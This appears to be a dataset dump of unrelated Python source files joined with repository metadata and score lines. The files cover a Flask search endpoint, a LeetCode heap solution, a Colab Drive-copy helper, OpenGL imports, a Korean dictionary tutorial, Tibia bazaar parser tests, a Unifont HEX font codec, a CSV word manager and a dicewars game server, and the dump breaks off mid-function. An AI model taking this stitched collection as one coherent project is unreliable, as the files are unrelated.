<filename>app/resources/SearchEndpoint.py import elasticsearch import flask_restful from flask import request, g from app import elastic_index, RestException from app.models import ThrivResource, Availability, ThrivInstitution from app.models import Facet, FacetCount, Filter, Search from app.resources.schema import SearchSchema, ThrivResourceSchema from app.resources.Auth import login_optional class SearchEndpoint(flask_restful.Resource): @login_optional def post(self): request_data = request.get_json() search, errors = SearchSchema().load(request_data) if errors: raise RestException(RestException.INVALID_OBJECT, details=errors) try: results = elastic_index.search_resources(search) except elasticsearch.ElasticsearchException as e: print(e) raise RestException(RestException.ELASTIC_ERROR) resources = [] filterredResults = [] for hit in results: resource = ThrivResource.query.filter_by(id=hit.id).first() if resource is not None and resource.user_may_view(): resources.append(resource) filterredResults.append(hit) search.total = results.hits.total search.resources = ThrivResourceSchema().dump( resources, many=True).data results.hits = filterredResults search.facets = [] for facet_name in results.facets: if facet_name == "Approved": if 'user' in g and g.user and g.user.role == "Admin": facet = Facet(facet_name) facet.facetCounts = [] for category, hit_count, is_selected in results.facets[ facet_name]: facet.facetCounts.append( FacetCount(category, hit_count, is_selected)) search.facets.append(facet) else: facet = Facet(facet_name) facet.facetCounts = [] for category, hit_count, is_selected in results.facets[ facet_name]: facet.facetCounts.append( FacetCount(category, hit_count, is_selected)) search.facets.append(facet) return SearchSchema().jsonify(search)
2.125
2
Python/lc_253_meeting_rooms_ii.py
cmattey/leetcode_problems
6
12789921
<gh_stars>1-10 # Time: O(nlogn) # Space: O(n) class Solution: def minMeetingRooms(self, intervals: List[List[int]]) -> int: import heapq if not intervals: return 0 intervals.sort(key = lambda interval:interval[0]) heap = [] heapq.heappush(heap, intervals[0][1]) for interval in intervals[1:]: if heap[0]<=interval[0]: heapq.heappop(heap) heapq.heappush(heap, interval[1]) return len(heap) # Oct 28th '19 # Time: O(nlogn) # Space: O(n) class Solution: def minMeetingRooms(self, intervals: List[List[int]]) -> int: import heapq if not intervals: return 0 intervals.sort(key=lambda kv:kv[0]) heap = [intervals[0][1]] for start, end in intervals[1:]: prev_end = heapq.heappop(heap) if start<prev_end: heapq.heappush(heap, prev_end) heapq.heappush(heap, end) else: heapq.heappush(heap, max(prev_end,end)) return len(heap)
2.921875
3
colab_transfer/transfer.py
woctezuma/google-colab-transfer
11
12789922
<reponame>woctezuma/google-colab-transfer<gh_stars>10-100 import glob import os import shutil from pathlib import Path from colab_transfer.google_drive import mount_google_drive, is_google_drive_mounted from colab_transfer.utils import get_path_to_home_of_google_drive, get_path_to_home_of_local_machine def copy_file(file_name, source=None, destination=None, verbose=True): if not is_google_drive_mounted(): mount_google_drive() if source is None: source = get_path_to_home_of_google_drive() if destination is None: destination = get_path_to_home_of_local_machine() else: Path(destination).mkdir(parents=True, exist_ok=True) input_file_name = source + file_name output_file_name = destination + file_name if Path(output_file_name).exists(): if verbose: print('File {} already exists. Copy skipped.'.format(output_file_name)) else: if verbose: print('Copying {} to {}'.format(input_file_name, output_file_name)) try: shutil.copyfile(input_file_name, output_file_name) except FileNotFoundError: print('File {} could not be found. Copy aborted.'.format(input_file_name)) return def copy_folder(folder_name, source=None, destination=None, verbose=True): if not is_google_drive_mounted(): mount_google_drive() if source is None: source = get_path_to_home_of_google_drive() if destination is None: destination = get_path_to_home_of_local_machine() else: Path(destination).mkdir(parents=True, exist_ok=True) input_folder_name = source + folder_name output_folder_name = destination + folder_name if Path(output_folder_name).exists(): if verbose: print('Folder {} already exists. Copy skipped.'.format(output_folder_name)) else: if verbose: print('Copying {} to {}'.format(input_folder_name, output_folder_name)) try: shutil.copytree(src=input_folder_name, dst=output_folder_name) except FileNotFoundError: print('Folder {} could not be found. Copy aborted.'.format(input_folder_name)) return def copy_folder_structure(source=None, destination=None, verbose=True): if not is_google_drive_mounted(): mount_google_drive() if source is None: source = get_path_to_home_of_google_drive() if destination is None: destination = get_path_to_home_of_local_machine() else: Path(destination).mkdir(parents=True, exist_ok=True) files_and_folders = glob.glob(source + '*') root_files = glob.glob(source + '*.*') root_folders = set(files_and_folders).difference(root_files) if verbose: print('Files: {}'.format(root_files)) print('Folders: {}'.format(root_folders)) for f_name in root_files: file_name = os.path.basename(f_name) copy_file(file_name, source=source, destination=destination, verbose=verbose) for f_name in root_folders: folder_name = os.path.basename(f_name) + '/' copy_folder(folder_name, source=source, destination=destination, verbose=verbose) return def main(): return True if __name__ == '__main__': main()
3.078125
3
lib/meshrenderer/gl_utils/__init__.py
THU-DA-6D-Pose-Group/self6dpp
33
12789923
# from .offscreen_context import OffscreenContext import os if os.environ.get("PYOPENGL_PLATFORM", None) == "egl": from .egl_offscreen_context import OffscreenContext else: from .glfw_offscreen_context import OffscreenContext from .fbo import Framebuffer from .renderbuffer import Renderbuffer, RenderbufferMultisample from .texture import ( Texture, TextureMultisample, Texture1D, Texture3D, loadTexture, ) from .shader import Shader from .shader_storage_buffer import ShaderStorage from .vertexbuffer import Vertexbuffer from .vao import VAO from .ibo import IBO from .ebo import EBO from .camera import Camera # from .window import Window from .material import Material from . import geometry as geo from .tiles import tiles, tiles4 from . import meshutil from . import utils from . import glcontext from . import glrenderer
1.429688
1
Dictionary.py
FatalWhite/Python3Lab
0
12789924
<reponame>FatalWhite/Python3Lab<filename>Dictionary.py # 딕셔너리 : 매핑 자료구조 # 키key에 값value을 연결시키는 방식으로 데이터를 다루는 방법 제공 # 키는 저장된 데이터를 식별하기 위한 번호나 이름 # 값은 각 키에 연결되어 저장된 테이터 # 따라서 키만 알면 데이터를 바로 찾을 수 있음 # 딕셔너리는 {} 에 키:값 형태로 이용 # 키:값이 여러개 존재할 경우, 로 구분 menu = { '1': 'newSungJuk', '2': 'showSungJuk', '3': 'modifySungJuk' } # 키는 다양한 자료형으로 사용 book = { 'bookid': '1', 'bookname': '축구의역사', 'publisher': '굿스포츠', 'price': '7000' } order = { 'orderid': '1', 'custid': '1', 'bookid': '1', 'saleprice': 6000, 'orderdate': '2014-07-01' } custromer = { 'custid': '1', 'name': '박지성', 'address': '영국 멘체스타', 'phone': '000-5000-0001' } print(book) books_list = [] books_list.append( book ) # 생성한 딕셔너리를 배열에 저장 books_list.append( book ) books_list.append( book ) print( books_list ) # 딕셔너리 처리 메서드 print( '1' in book ) # 딕셔너리에서 in 연산자는 key를 검색 print('bookid' in book) print( book[ 'bookid' ] ) # 딕셔너리에서 키로 검색 print( book[ 'bookname' ] ) print( book[ 'price' ] ) # print( book[ 'orderid' ] ) # 존재하지 않는 키 검색시 오류! print( book.get( 'bookname' ) ) print( book.get( 'orderid' ) ) # 존재하지 않는 키 검색시 None 출력 bkname = book[ 'bookname' ] # 키로 검색후 값 출력 print( bkname ) print( book.get( 'bookid' ) ) book[ 'bookid' ] = 99 # 키로 값 수정 print( book.get( 'bookid' ) ) print( book ) book.update( { '판형': '3 x 4' } ) # 새로운 키: 값 추가 print( book ) print( book ) book.update( { '판형': '6 x 10' } ) # 새로운 키: 값 수정 print( book ) del book[ '판형' ] # 기존 키 삭제 print( book ) # book.clear() # 모든 키 삭제 print( book.keys() ) # 모든 키를 출력 print( book.values() ) # 모든 값을 출력 print( book.items() ) # 모든 키:값을 튜플로 출력 items = book.items() # 모든 키:값을 튜플-리스트로 출력 print( list( items ) )
2.25
2
tests/tests_bazaar.py
vitorruiz/tibia.py
22
12789925
<reponame>vitorruiz/tibia.py import datetime import unittest from tests.tests_tibiapy import TestCommons from tibiapy import Auction, AuctionOrder, AuctionOrderBy, AuctionSearchType, AuctionStatus, BattlEyeTypeFilter, \ BidType, \ CharacterBazaar, \ InvalidContent, PvpTypeFilter, \ Sex, SkillFilter, \ Vocation, VocationAuctionFilter FILE_BAZAAR_CURRENT_EMPTY = "bazaar/tibiacom_history_empty.txt" FILE_BAZAAR_CURRENT = "bazaar/tibiacom_current.txt" FILE_BAZAAR_CURRENT_ALL_FILTERS = "bazaar/tibiacom_current_all_filters.txt" FILE_BAZAAR_HISTORY = "bazaar/tibiacom_history.txt" FILE_AUCTION_FINISHED = "bazaar/tibiacom_auction_finished.txt" FILE_AUCTION_NOT_FOUND = "bazaar/tibiacom_auction_not_found.txt" class TestBazaar(TestCommons, unittest.TestCase): def test_character_bazaar_from_content_current_no_filters_selected(self): bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT)) self.assertIsNotNone(bazaar) self.assertEqual(300, bazaar.page) self.assertEqual(482, bazaar.total_pages) self.assertEqual(12031, bazaar.results_count) self.assertEqual(25, len(bazaar.entries)) self.assertIsNotNone(bazaar.url) auction = bazaar.entries[0] self.assertEqual(30237, auction.auction_id) self.assertEqual(800, auction.bid) self.assertEqual(BidType.MINIMUM, auction.bid_type) self.assertIsNotNone(auction.character_url) self.assertEqual(0, len(auction.displayed_items)) self.assertIsNotNone(bazaar.filters) self.assertIsNone(bazaar.filters.world) self.assertIsNone(bazaar.filters.pvp_type) self.assertIsNone(bazaar.filters.battleye) self.assertIsNone(bazaar.filters.vocation) self.assertIsNone(bazaar.filters.min_level) self.assertIsNone(bazaar.filters.max_level) self.assertIsNone(bazaar.filters.skill) self.assertIsNone(bazaar.filters.min_skill_level) self.assertIsNone(bazaar.filters.max_skill_level) self.assertEqual(AuctionOrder.LOWEST_EARLIEST, bazaar.filters.order) def test_character_bazaar_from_content_current_all_filters_selected(self): bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT_ALL_FILTERS)) self.assertIsNotNone(bazaar) self.assertEqual(1, bazaar.page) self.assertEqual(4, bazaar.total_pages) self.assertEqual(92, bazaar.results_count) self.assertEqual(25, len(bazaar.entries)) self.assertIsNotNone(bazaar.url) auction = bazaar.entries[0] self.assertEqual(82526, auction.auction_id) self.assertEqual(57000, auction.bid) self.assertEqual(BidType.MINIMUM, auction.bid_type) self.assertIsNotNone(auction.character_url) self.assertIsNotNone(bazaar.filters) self.assertEqual('Antica', bazaar.filters.world) self.assertEqual(PvpTypeFilter.OPEN_PVP, bazaar.filters.pvp_type) self.assertEqual(BattlEyeTypeFilter.PROTECTED, bazaar.filters.battleye) self.assertEqual(VocationAuctionFilter.KNIGHT, bazaar.filters.vocation) self.assertEqual(1, bazaar.filters.min_level) self.assertEqual(1000, bazaar.filters.max_level) self.assertEqual(SkillFilter.MAGIC_LEVEL, bazaar.filters.skill) self.assertEqual(1, bazaar.filters.min_skill_level) self.assertEqual(50, bazaar.filters.max_skill_level) self.assertEqual(AuctionOrderBy.SHIELDING, bazaar.filters.order_by) self.assertEqual(AuctionOrder.HIGHEST_LATEST, bazaar.filters.order) self.assertEqual(AuctionSearchType.ITEM_WILDCARD, bazaar.filters.search_type) def test_character_bazaar_from_content_empty(self): bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT_EMPTY)) self.assertIsNotNone(bazaar) self.assertFalse(bazaar.entries) def test_character_bazaar_from_content_history(self): bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_HISTORY)) self.assertIsNotNone(bazaar) self.assertEqual(1, bazaar.page) self.assertEqual(1449, bazaar.total_pages) self.assertEqual(36219, bazaar.results_count) self.assertEqual(25, len(bazaar.entries)) self.assertIsNotNone(bazaar.url) auction = bazaar.entries[0] self.assertEqual(325058, auction.auction_id) self.assertEqual(900, auction.bid) self.assertEqual("Rcrazy Illuminati", auction.name) self.assertEqual(255, auction.level) self.assertEqual("Celebra", auction.world) self.assertEqual(Vocation.MASTER_SORCERER, auction.vocation) self.assertEqual(Sex.MALE, auction.sex) self.assertEqual(BidType.WINNING, auction.bid_type) self.assertIsNotNone(auction.character_url) self.assertEqual(1, len(auction.displayed_items)) self.assertEqual(143, auction.outfit.outfit_id) first_item = auction.displayed_items[0] self.assertEqual(1, first_item.count) self.assertEqual(25700, first_item.item_id) self.assertEqual("dream blossom staff", first_item.name) self.assertIsNotNone(first_item.image_url) self.assertIsNone(bazaar.filters) def test_character_bazaar_from_content_unrelated(self): """Testing parsing an unrelated tibia.com section""" content = self.load_resource(self.FILE_UNRELATED_SECTION) with self.assertRaises(InvalidContent): CharacterBazaar.from_content(content) def test_auction_details_from_content_finished(self): auction = Auction.from_content(self.load_resource(FILE_AUCTION_FINISHED)) self.assertIsNotNone(auction) # Listing box self.assertEqual("Vireloz", auction.name) self.assertIn(auction.name, auction.character_url) self.assertIn(str(auction.auction_id), auction.url) self.assertEqual(1161, auction.level) self.assertEqual(Vocation.ROYAL_PALADIN, auction.vocation) self.assertEqual(Sex.MALE, auction.sex) self.assertEqual("Wintera", auction.world) self.assertIsNotNone(auction.outfit) self.assertEqual(1322, auction.outfit.outfit_id) self.assertEqual(4, len(auction.displayed_items)) self.assertEqual("gnome armor", auction.displayed_items[0].name) self.assertEqual("falcon coif", auction.displayed_items[1].name) self.assertEqual("pair of soulstalkers", auction.displayed_items[2].name) self.assertEqual("lion spangenhelm", auction.displayed_items[3].name) self.assertEqual(330000, auction.bid) self.assertEqual(BidType.MINIMUM, auction.bid_type) self.assertEqual(AuctionStatus.FINISHED, auction.status) self.assertEqual(11715, auction.hit_points) self.assertEqual(17385, auction.mana) self.assertEqual(23530, auction.capacity) self.assertEqual(1270, auction.speed) self.assertEqual(0, auction.blessings_count) self.assertEqual(23, auction.mounts_count) self.assertEqual(35, auction.outfits_count) self.assertEqual(16, auction.titles_count) self.assertEqual(8, len(auction.skills)) self.assertEqual(128, auction.skills_map["Distance Fighting"].level) self.assertEqual(11.43, auction.skills_map["Distance Fighting"].progress) self.assertIsInstance(auction.creation_date, datetime.datetime) self.assertEqual(26006721711, auction.experience) self.assertEqual(41893, auction.gold) self.assertEqual(553, auction.achievement_points) self.assertIsNone(auction.regular_world_transfer_available_date) self.assertEqual(110, auction.available_charm_points) self.assertEqual(5800, auction.spent_charm_points) self.assertEqual(2, auction.daily_reward_streak) self.assertEqual(1494, auction.hunting_task_points) self.assertEqual(0, auction.permanent_hunting_task_slots) self.assertEqual(1, auction.permanent_prey_slots) self.assertEqual(1, auction.hirelings) self.assertEqual(3, auction.hireling_jobs) self.assertEqual(0, auction.hireling_outfits) self.assertIsNotNone(auction.items) self.assertEqual(76, len(auction.items.entries)) self.assertEqual(8, auction.items.total_pages) self.assertEqual(567, auction.items.results) self.assertEqual(141, auction.items.get_by_name("cigar").item_id) self.assertEqual("cigar", auction.items.get_by_id(141).name) self.assertEqual(7, len(auction.items.search('backpack'))) self.assertIsNotNone(auction.store_items) self.assertEqual(16, len(auction.store_items.entries)) self.assertEqual(1, auction.store_items.total_pages) self.assertEqual(16, auction.store_items.results) self.assertEqual(23721, auction.store_items.get_by_name("gold pouch").item_id) self.assertEqual("gold pouch", auction.store_items.get_by_id(23721).name) self.assertEqual(2, len(auction.store_items.search('rune'))) self.assertIsNotNone(auction.mounts) self.assertEqual(22, len(auction.mounts.entries)) self.assertEqual(1, auction.mounts.total_pages) self.assertEqual(22, auction.mounts.results) self.assertEqual(387, auction.mounts.get_by_name("donkey").mount_id) self.assertEqual("Donkey", auction.mounts.get_by_id(387).name) self.assertEqual(1, len(auction.mounts.search('drag'))) self.assertIsNotNone(auction.store_mounts) self.assertEqual(1, len(auction.store_mounts.entries)) self.assertEqual(1, auction.store_mounts.total_pages) self.assertEqual(1, auction.store_mounts.results) self.assertEqual(906, auction.store_mounts.get_by_name("Wolpertinger").mount_id) self.assertEqual("Wolpertinger", auction.store_mounts.get_by_id(906).name) self.assertEqual(1, len(auction.store_mounts.search('Wolpertinger'))) self.assertIsNotNone(auction.outfits) self.assertEqual(30, len(auction.outfits.entries)) self.assertEqual(2, auction.outfits.total_pages) self.assertEqual(33, auction.outfits.results) self.assertEqual(151, auction.outfits.get_by_name("pirate").outfit_id) self.assertEqual('Glooth Engineer', auction.outfits.get_by_id(610).name) self.assertEqual(2, len(auction.outfits.search('demon'))) self.assertIsNotNone(auction.store_outfits) self.assertEqual(2, len(auction.store_outfits.entries)) self.assertEqual(1, auction.store_outfits.total_pages) self.assertEqual(2, auction.store_outfits.results) self.assertEqual(962, auction.store_outfits.get_by_name("retro warrior").outfit_id) self.assertEqual('Retro Warrior', auction.store_outfits.get_by_id(962).name) self.assertEqual(2, len(auction.store_outfits.search('retro'))) self.assertIsNotNone(auction.familiars) self.assertEqual(1, len(auction.familiars.entries)) self.assertEqual(1, auction.familiars.total_pages) self.assertEqual(1, auction.familiars.results) self.assertEqual(992, auction.familiars.get_by_name("emberwing").familiar_id) self.assertEqual('Emberwing', auction.familiars.get_by_id(992).name) self.assertEqual(1, len(auction.familiars.search('ember'))) self.assertEqual(9, len(auction.blessings)) self.assertEqual(18, len(auction.imbuements)) self.assertEqual(8, len(auction.charms)) self.assertEqual(0, len(auction.completed_cyclopedia_map_areas)) self.assertEqual(16, len(auction.titles)) self.assertEqual(217, len(auction.achievements)) self.assertEqual(509, len(auction.bestiary_progress)) self.assertEqual(205, len(auction.completed_bestiary_entries)) def test_auction_details_from_content_finished_skip_details(self): auction = Auction.from_content(self.load_resource(FILE_AUCTION_FINISHED), skip_details=True) self.assertIsNotNone(auction) # Listing box self.assertEqual("Vireloz", auction.name) self.assertIn(auction.name, auction.character_url) self.assertIn(str(auction.auction_id), auction.url) self.assertEqual(1161, auction.level) self.assertEqual(Vocation.ROYAL_PALADIN, auction.vocation) self.assertEqual(Sex.MALE, auction.sex) self.assertEqual("Wintera", auction.world) self.assertIsNotNone(auction.outfit) self.assertEqual(1322, auction.outfit.outfit_id) self.assertEqual(4, len(auction.displayed_items)) self.assertEqual("gnome armor", auction.displayed_items[0].name) self.assertEqual("falcon coif", auction.displayed_items[1].name) self.assertEqual("pair of soulstalkers", auction.displayed_items[2].name) self.assertEqual("lion spangenhelm", auction.displayed_items[3].name) self.assertEqual(330000, auction.bid) self.assertEqual(BidType.MINIMUM, auction.bid_type) self.assertEqual(AuctionStatus.FINISHED, auction.status) def test_auction_details_from_content_not_found(self): auction = Auction.from_content(self.load_resource(FILE_AUCTION_NOT_FOUND)) self.assertIsNone(auction) def test_auction_details_from_content_unrelated(self): """Testing parsing an unrelated tibia.com section""" content = self.load_resource(self.FILE_UNRELATED_SECTION) with self.assertRaises(InvalidContent): Auction.from_content(content)
2.4375
2
monobit/formats/hex.py
robhagemans/monobit
74
12789926
""" monobit.hex - Unifont Hex format (c) 2019--2021 <NAME> licence: https://opensource.org/licenses/MIT """ # HEX format documentation # http://czyborra.com/unifont/ import logging import string from ..storage import loaders, savers from ..streams import FileFormatError from ..font import Font from ..glyph import Glyph @loaders.register('hext', name='PC-BASIC Extended HEX') def load_hext(instream, where=None): """Load 8xN multi-cell font from PC-BASIC extended .HEX file.""" return _load_hex(instream.text) @loaders.register('hex', name='Unifont HEX') def load_hex(instream, where=None): """Load 8x16 multi-cell font from Unifont .HEX file.""" return _load_hex(instream.text) @savers.register(linked=load_hex) def save_hex(fonts, outstream, where=None): """Save 8x16 multi-cell font to Unifont .HEX file.""" font = _validate(fonts) _save_hex(font, outstream.text, _fits_in_hex) @savers.register(linked=load_hext) def save_hext(fonts, outstream, where=None): """Save 8xN multi-cell font to PC-BASIC extended .HEX file.""" font = _validate(fonts) _save_hex(font, outstream.text, _fits_in_hext) def _validate(fonts): """Check if font fits in file format.""" if len(fonts) > 1: raise FileFormatError('Can only save one font to hex file.') font, = fonts if font.spacing not in ('character-cell', 'multi-cell'): raise FileFormatError( 'This format only supports character-cell or multi-cell fonts.' ) return font ############################################################################## # loader def _load_hex(instream): """Load font from a .hex file.""" global_comment = [] glyphs = [] comment = [] for line in instream: line = line.rstrip('\r\n') if ':' in line: # parse code line key, value = line.rsplit(':', 1) value = value.strip() if ( # preserve empty lines if they separate comments (not line and comment and comment[-1] != '') # marked as comment or line[0] == '#' # pass through lines without : as comments - allows e.g. to convert diffs, like hexdraw or (':' not in line) # not a valid line, treat as comment or set(value) - set(string.hexdigits + ',') ): comment.append(line) else: # when first glyph is found, split comment lines between global and glyph if not glyphs and comment: global_comment, comment = split_global_comment(comment) glyphs.append(_convert_glyph(key, value, comment)) comment = [] # preserve any comment at end of file as part of global comment global_comment = '\n'.join([*_clean_comment(global_comment), *_clean_comment(comment)]) return Font(glyphs, comments=global_comment, properties=dict(encoding='unicode')) def _convert_label(key): """Ctreate char label from key string.""" try: return ''.join(chr(int(_key, 16)) for _key in key.split(',')) except ValueError: return '' def _convert_glyph(key, value, comment): """Create Glyph object from key string and hex value.""" # determine geometry # two standards: 8-pix wide, or 16-pix wide # if height >= 32, they conflict num_bytes = len(value) // 2 if num_bytes < 32: width, height = 8, num_bytes else: width, height = 16, num_bytes // 2 # get labels char = _convert_label(key) return Glyph.from_hex(value, width, height).modify( char=char, tags=([key] if not char else []), comments=_clean_comment(comment) ) def _clean_comment(lines): """Remove leading characters from comment.""" while lines and not lines[-1]: lines = lines[:-1] if not lines: return [] lines = [_line or '' for _line in lines] # remove "comment char" - non-alphanumeric shared first character firsts = str(set(_line[0:1] for _line in lines if _line)) if len(firsts) == 1 and firsts not in string.ascii_letters + string.digits: lines = [_line[1:] for _line in lines] # remove one leading space if all(_line.startswith(' ') for _line in lines if _line): lines = [_line[1:] for _line in lines] return lines def split_global_comment(lines): """Split top comments into global and first glyph comment.""" while lines and not lines[-1]: lines = lines[:-1] try: splitter = lines[::-1].index('') except ValueError: global_comment = lines lines = [] else: global_comment = lines[:-splitter-1] lines = lines[-splitter:] return global_comment, lines ############################################################################## # saver def _save_hex(font, outstream, fits): """Save 8x16 multi-cell font to Unifont or PC-BASIC Extended .HEX file.""" # global comment if font.get_comments(): outstream.write(_format_comment(font.get_comments(), comm_char='#') + '\n\n') # glyphs for glyph in font.glyphs: if fits(glyph): outstream.write(_format_glyph(glyph)) else: logging.warning('Skipping %s: %s', glyph.char, glyph.as_hex()) def _fits_in_hex(glyph): """Check if glyph fits in Unifont Hex format.""" if len(glyph.char) > 1: logging.warning('Hex format does not support multi-codepoint grapheme clusters.') return False if glyph.height != 16 or glyph.width not in (8, 16): logging.warning( 'Hex format only supports 8x16 or 16x16 glyphs, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' ) return False return True def _fits_in_hext(glyph): """Check if glyph fits in PC-BASIC Extended Hex format.""" if glyph.width not in (8, 16): logging.warning( 'Extended Hex format only supports glyphs of width 8 or 16 pixels, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' ) return False if glyph.height >= 32: logging.warning( 'Extended Hex format only supports glyphs less than 32 pixels high, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' ) return False return True def _format_glyph(glyph): """Format glyph line for hex file.""" return ( # glyph comment ('' if not glyph.comments else '\n' + _format_comment(glyph.comments, comm_char='#') + '\n') + '{}:{}\n'.format( # label u','.join(f'{ord(_c):04X}' for _c in glyph.char), # hex code glyph.as_hex().upper() ) ) def _format_comment(comment, comm_char): """Format a multiline comment.""" return '\n'.join(f'{comm_char} {_line}' for _line in comment.splitlines())
2.546875
3
csv_manager.py
Hey7ude/word-translate-practice
0
12789927
import csv def open_file_or_create(name: str, mode): try: return open(name, mode) except: f = open(name, 'a') f.close() return open(name, mode) def import_csv(words_list: list, class_name, filename = 'data.csv'): csv_file = open_file_or_create(filename, 'r') csv_reader = csv.DictReader(csv_file) for line in csv_reader: word = line['word'] translate = line['translate'] is_learned = True if line['is_learned'] == 'True' else False answers = line['answers'][1:-1].replace(' ', '').split(',') for i in range(len(answers)): if answers[i] == 'True': answers[i] = True elif answers[i] == 'False': answers[i] = False else: answers = [] words_list.append(class_name(word=word, translate=translate, is_learned=is_learned, answers=answers)) csv_file.close() def export_csv(words_list: list, file_name='data.csv'): csv_file = open_file_or_create(file_name, 'w') csv_writer = csv.DictWriter(csv_file, fieldnames=words_list[0].__dict__.keys()) csv_writer.writeheader() for i in range(len(words_list)): csv_writer.writerow(words_list[i].__dict__) csv_file.close()
3.4375
3
dicewars/server/game.py
thejoeejoee/SUI-MIT-VUT-2020-2021
0
12789928
import json from json.decoder import JSONDecodeError import logging import random import socket import sys from .player import Player from .summary import GameSummary MAX_PASS_ROUNDS = 8 MAX_BATTLES_PER_GAME = 10000 # obsevered maximum of 5671 over over 100k games class Game: """Instance of the game """ def __init__(self, board, area_ownership, players, addr, port, nicknames_order): """Initialize game and connect clients Parameters ---------- players : int Number of players addr : str IP address of the server port : int Port number Attributes ---------- buffer : int Size of socket buffer number_of_players : int Number of players """ self.buffer = 65535 self.logger = logging.getLogger('SERVER') self.address = addr self.port = port self.number_of_players = players self.nb_players_alive = players self.nb_consecutive_end_of_turns = 0 self.nb_battles = 0 self.create_socket() self.board = board self.initialize_players() self.connect_clients() if nicknames_order is not None: self.adjust_player_order(nicknames_order) self.report_player_order() self.assign_areas_to_players(area_ownership) self.logger.debug("Board initialized") for player in self.players.values(): self.send_message(player, 'game_start') self.summary = GameSummary() def run(self): """Main loop of the game """ from dicewars.ml.game import serialise_game_configuration, save_game_configurations configurations = set() try: for i in range(1, self.number_of_players + 1): player = self.players[i] self.send_message(player, 'game_state') while True: self.logger.debug("Current player {}".format(self.current_player.get_name())) self.handle_player_turn() if self.check_win_condition(): sys.stdout.write(str(self.summary)) for i, p in self.players.items(): if p.get_number_of_areas() == self.board.get_number_of_areas(): save_game_configurations( winner_index=i, configurations=configurations, ) break break serialised_game = serialise_game_configuration( board=self.board, players=self.players, ) configurations.add(serialised_game) except KeyboardInterrupt: self.logger.info("Game interrupted.") for i in range(1, self.number_of_players + 1): player = self.players[i] self.send_message(player, 'close_socket') except (BrokenPipeError, JSONDecodeError) as e: self.logger.error("Connection to client failed: {0}".format(e)) except ConnectionResetError: self.logger.error("ConnectionResetError") try: self.close_connections() except BrokenPipeError: pass ############## # GAME LOGIC # ############## def assign_area(self, area, player): """Assign area to a new owner Parameters ---------- area : Area Area to be assigned new owner to player : Player New owner """ area.set_owner_name(player.get_name()) player.add_area(area) def handle_player_turn(self): """Handle clients message and carry out the action """ self.logger.debug("Handling player {} ({}) turn".format(self.current_player.get_name(), self.current_player.nickname)) player = self.current_player.get_name() msg = self.get_message(player) if msg['type'] == 'battle': self.nb_consecutive_end_of_turns = 0 battle = self.battle(self.board.get_area_by_name(msg['atk']), self.board.get_area_by_name(msg['def'])) self.summary.add_battle() self.logger.debug("Battle result: {}".format(battle)) for p in self.players: self.send_message(self.players[p], 'battle', battle=battle) elif msg['type'] == 'end_turn': self.nb_consecutive_end_of_turns += 1 affected_areas = self.end_turn() for p in self.players: self.send_message(self.players[p], 'end_turn', areas=affected_areas) def get_state(self): """Get game state Returns ------- dict Dictionary containing owner, dice and adjacent areas of each area, as well as score of each player """ game_state = { 'areas': {} } for a in self.board.areas: area = self.board.areas[a] game_state['areas'][area.name] = { 'adjacent_areas': area.get_adjacent_areas_names(), 'owner': area.get_owner_name(), 'dice': area.get_dice() } game_state['score'] = {} for p in self.players: player = self.players[p] game_state['score'][player.get_name()] = player.get_largest_region(self.board) return game_state def battle(self, attacker, defender): """Carry out a battle Returns ------- dict Dictionary with the result of the battle including information about rolled numbers, dice left after the battle, and possible new ownership of the areas """ self.nb_battles += 1 atk_dice = attacker.get_dice() def_dice = defender.get_dice() atk_pwr = def_pwr = 0 atk_name = attacker.get_owner_name() def_name = defender.get_owner_name() for i in range(0, atk_dice): atk_pwr += random.randint(1, 6) for i in range(0, def_dice): def_pwr += random.randint(1, 6) battle = { 'atk': { 'name': attacker.get_name(), 'dice': 1, 'owner': atk_name, 'pwr': atk_pwr } } attacker.set_dice(1) if atk_pwr > def_pwr: defender.set_owner_name(atk_name) self.players[atk_name].add_area(defender) self.players[def_name].remove_area(defender) if self.players[def_name].get_number_of_areas() == 0: self.eliminate_player(def_name) attacker.set_dice(1) defender.set_dice(atk_dice - 1) battle['def'] = { 'name': defender.get_name(), 'dice': atk_dice - 1, 'owner': atk_name, 'pwr': def_pwr } else: battle['def'] = { 'name': defender.get_name(), 'dice': def_dice, 'owner': def_name, 'pwr': def_pwr } return battle def end_turn(self): """Handles end turn command Returns ------- dict Dictionary of affected areas including number of dice in these areas """ affected_areas = [] player = self.current_player dice = player.get_reserve() + player.get_largest_region(self.board) if dice > 64: dice = 64 areas = [] for area in self.current_player.get_areas(): areas.append(area) while dice and areas: area = random.choice(areas) if not area.add_die(): areas.remove(area) else: if area not in affected_areas: affected_areas.append(area) dice -= 1 player.set_reserve(dice) self.set_next_player() list_of_areas = {} for area in affected_areas: list_of_areas[area.get_name()] = { 'owner': area.get_owner_name(), 'dice': area.get_dice() } return list_of_areas def set_first_player(self): """Set first player """ for player in self.players: if self.players[player].get_name() == self.players_order[0]: self.current_player = self.players[player] self.logger.debug("Current player: {}".format(self.current_player.get_name())) return def set_next_player(self): """Set next player in order as a current player """ current_player_name = self.current_player.get_name() current_idx = self.players_order.index(current_player_name) idx = self.players_order[(current_idx + 1) % self.number_of_players] while True: try: if self.players[idx].get_number_of_areas() == 0: current_idx = (current_idx + 1) % self.number_of_players idx = self.players_order[(current_idx + 1) % self.number_of_players] continue self.current_player = self.players[idx] self.logger.debug("Current player: {}".format(self.current_player.get_name())) except IndexError: exit(1) return def eliminate_player(self, player): nickname = self.players[player].get_nickname() self.summary.add_elimination(nickname, self.summary.nb_battles) self.logger.info("Eliminated player {} ({})".format(player, nickname)) self.nb_players_alive -= 1 def check_win_condition(self): """Check win conditions Returns ------- bool True if a player has won, False otherwise """ if self.nb_consecutive_end_of_turns // self.nb_players_alive == MAX_PASS_ROUNDS: self.logger.info("Game cancelled because the limit of {} rounds of passing has been reached".format(MAX_PASS_ROUNDS)) for p in self.players.values(): if p.get_number_of_areas() > 0: self.eliminate_player(p.get_name()) self.process_win(None, -1) return True if self.nb_battles == MAX_BATTLES_PER_GAME: self.logger.info("Game cancelled because the limit of {} battles has been reached".format(MAX_BATTLES_PER_GAME)) for p in self.players.values(): if p.get_number_of_areas() > 0: self.eliminate_player(p.get_name()) self.process_win(None, -1) return True for p in self.players: 